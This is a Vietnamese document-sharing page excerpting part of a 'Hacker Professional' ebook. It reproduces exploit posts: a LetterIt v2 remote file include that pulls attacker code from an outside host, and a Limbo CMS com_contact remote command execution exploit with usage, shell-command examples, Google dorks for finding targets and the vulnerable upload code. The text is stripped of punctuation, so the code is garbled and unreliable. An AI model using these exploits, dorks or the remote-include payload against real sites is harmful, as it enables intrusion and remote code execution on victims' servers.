TAILIEUCHUNG - Hacker Professional Ebook part 391

Ebook giới thiệu các công cụ và đồ nghề cần thiết cho việc Hack-Security. Ebook gồm có 1177 bài viết trong 28 chủ đề chính Phần 39: 10 part gồm Learning Windows, Learning Unix – Linux. | LetterIt v2 inc Remote File Include Vulnerability PHP Code LetterIt RFI Info - Scripts LetterIt download http dl 45 Version 2 Dork vuln download scripts and think Exploit http localhost path inc sessionerror 0 lang http EvElCoDe .txt Black_hat_cr HCE Limbo CMS com_contact Remote Code Execution Exploit quote usr bin php -q -d short_open_tag on print_r Limbo com_contact remote commands execution exploit by rgod rgod@ site http dorks inurl contact inurl Itemid inurl option attachment Enter your name intext site powered by limbo if argc 3 print_r Usage php . argv 0 . host path itemid cmd OPTIONS host target server ip hostname path path to Limbo itemid a number check or cmd a shell command Options -p port specify a port other than 80 -P ip port specify a proxy Example php . argv 0 . limbo 43 ls -la 80 php . argv 0 . 3 cat . . . -p81 die explaination there are some upload scripts in default installation check http target path to limbo contact http target path to limbo . .option contact and there is a vulnerable function in components com_contact near lines 69-73 . function file_ext file ext explode . file return strtolower ext 1 ------------------------------ . now look at components com_contact . switch task case post abs_dir lm_absolute_path. images contact web_dir lm_website. images contact if is_dir abs_dir mkdir abs_dir valid_ext array jpg png gif doc xls if _FILES contact_attach name tmp_name _FILES contact_attach tmp_name name _FILES contact_attach name ext file_ext name -------------------------- if in_array ext valid_ext ------------------------ script language JavaScript type text javascript alert php echo _MESSAGE_ATTACH_INVALID -l script php else

Đã phát hiện trình chặn quảng cáo AdBlock
Trang web này phụ thuộc vào doanh thu từ số lần hiển thị quảng cáo để tồn tại. Vui lòng tắt trình chặn quảng cáo của bạn hoặc tạm dừng tính năng chặn quảng cáo cho trang web này.